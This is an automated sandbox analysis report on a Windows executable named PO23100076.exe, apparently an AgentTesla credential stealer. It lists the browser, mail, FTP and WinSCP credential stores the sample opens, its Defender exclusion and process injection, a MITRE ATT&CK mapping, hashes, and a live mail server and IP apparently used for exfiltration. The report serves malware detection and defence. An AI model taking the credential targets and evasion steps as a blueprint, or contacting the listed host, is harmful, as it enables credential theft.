                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Users\user\Desktop\PO23100076.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO23100076.exe PID: 6936, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.PO23100076.exe.35f88d8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.PO23100076.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO23100076.exe.37f7348.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2487084327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.PO23100076.exe.67b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO23100076.exe.67b0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1276854543.00000000067B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\Desktop\PO23100076.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO23100076.exe PID: 6936, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO23100076.exe PID: 6936, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.PO23100076.exe.35f88d8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.PO23100076.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO23100076.exe.37f7348.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2487084327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.PO23100076.exe.67b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO23100076.exe.67b0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1276854543.00000000067B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      1
                      Masquerading
                      2
                      OS Credential Dumping
                      111
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      1
                      Credentials in Registry
                      1
                      Process Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                      Virtualization/Sandbox Evasion
                      Security Account Manager141
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares2
                      Data from Local System
                      1
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture11
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Obfuscated Files or Information
                      Cached Domain Credentials24
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586625 Sample: PO23100076.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 28 mail.mbarieservicesltd.com 2->28 32 Suricata IDS alerts for network traffic 2->32 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 13 other signatures 2->38 8 PO23100076.exe 4 2->8         started        signatures3 process4 file5 26 C:\Users\user\AppData\...\PO23100076.exe.log, ASCII 8->26 dropped 40 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->40 42 Adds a directory exclusion to Windows Defender 8->42 44 Injects a PE file into a foreign processes 8->44 12 PO23100076.exe 2 8->12         started        16 powershell.exe 23 8->16         started        18 PO23100076.exe 8->18         started        20 PO23100076.exe 8->20         started        signatures6 process7 dnsIp8 30 mail.mbarieservicesltd.com 199.79.62.115, 49702, 587 PUBLIC-DOMAIN-REGISTRYUS United States 12->30 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 22 WmiPrvSE.exe 16->22         started        24 conhost.exe 16->24         started        signatures9 process10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      PO23100076.exe45%ReversingLabsByteCode-MSIL.Trojan.Genie8DN
                      PO23100076.exe47%VirustotalBrowse
                      PO23100076.exe100%AviraHEUR/AGEN.1310026
                      PO23100076.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://mail.mbarieservicesltd.com0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.mbarieservicesltd.com
                      199.79.62.115
                      truetrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO23100076.exe, 00000000.00000002.1273050070.00000000025D1000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://mail.mbarieservicesltd.comPO23100076.exe, 00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          199.79.62.115
                          mail.mbarieservicesltd.comUnited States
                          394695PUBLIC-DOMAIN-REGISTRYUStrue
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1586625
                          Start date and time:2025-01-09 12:40:06 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 22s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:19
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:PO23100076.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@11/6@3/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 51
                          • Number of non-executed functions: 13
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 52.149.20.212
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          TimeTypeDescription
                          06:41:01API Interceptor38x Sleep call for process: PO23100076.exe modified
                          06:41:03API Interceptor16x Sleep call for process: powershell.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          199.79.62.115Quote_8714.exeGet hashmaliciousAgentTeslaBrowse
                            PO82200487.exeGet hashmaliciousAgentTeslaBrowse
                              ORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
                                QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                  SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                    Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                      LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                          Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                            Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              mail.mbarieservicesltd.comQuote_8714.exeGet hashmaliciousAgentTeslaBrowse
                                              • 199.79.62.115
                                              PO82200487.exeGet hashmaliciousAgentTeslaBrowse
                                              • 199.79.62.115
                                              ORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
                                              • 199.79.62.115
                                              QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                              • 199.79.62.115
                                              SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                              • 199.79.62.115
                                              Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                              • 199.79.62.115
                                              LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 199.79.62.115
                                              Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                              • 199.79.62.115
                                              Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                              • 199.79.62.115
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              PUBLIC-DOMAIN-REGISTRYUSENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 208.91.198.176
                                              document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 208.91.199.225
                                              yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 208.91.198.176
                                              ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 208.91.198.176
                                              http://www.technoafriwave.rwGet hashmaliciousUnknownBrowse
                                              • 207.174.214.183
                                              W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 208.91.199.115
                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 208.91.198.176
                                              YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                              • 103.53.42.63
                                              v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                              • 103.53.42.63
                                              InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                              • 208.91.198.106
                                              No context
                                              No context
                                              Process:C:\Users\user\Desktop\PO23100076.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.380805901110357
                                              Encrypted:false
                                              SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugei/ZM0Uyus:lGLHxvCsIfA2KRHmOugA1s
                                              MD5:53E51A711DEB8FFE6A8D0809822F7B76
                                              SHA1:F555FAAFECE73CF7A4C24E1AE7BDDB04DD6795F9
                                              SHA-256:D25DA2C34AFF2489A76C91F568704C7854667DF6EB2907B13C5ED0CDF6D2A3AD
                                              SHA-512:FADA0DFC65D1F0D8669F7C110DCF261EF6F2DCA27B525A79FDF3BD0861E0EC8A5880E20BB2FF28592F1473D90CE93A707FEA63535D1782E5838A4F63B009B3CA
                                              Malicious:false
                                              Reputation:low
                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.9068258043183075
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:PO23100076.exe
                                              File size:671'744 bytes
                                              MD5:abef12c0ec6c52759f2cd9cc5402e593
                                              SHA1:5f8d0e0b219578e9bf15ebb85b36de1d3d951e6f
                                              SHA256:5b2d21f50ea195e247b45b8330c18acfd0f71e146fe40489ee8301c7045daf04
                                              SHA512:83a9b9097e1eb1ec16f18a310a8c48eccf92cd4206cacefd1dee01219cd82c81f3f32d1eabbf1b88c3cc71fb3e5a226c5bee7d6fd4174a088a32cae8b772c26c
                                              SSDEEP:12288:4siyJ/iRs7N27Z84ScUducRb8TllLXer4XG6OXDsSPMSH+KE:t5iR6gaclseXNGBDLBxE
                                              TLSH:32E4124EAD7AA778D15D8F7FD213244D4079AE03E602F36E5DCA0EE40F35608C69E682
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.g.....................*......n2... ........@.. ....................................`................................
                                              Icon Hash:33362c2d36335470
                                              Entrypoint:0x4a326e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x677F6CB0 [Thu Jan 9 06:29:04 2025 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
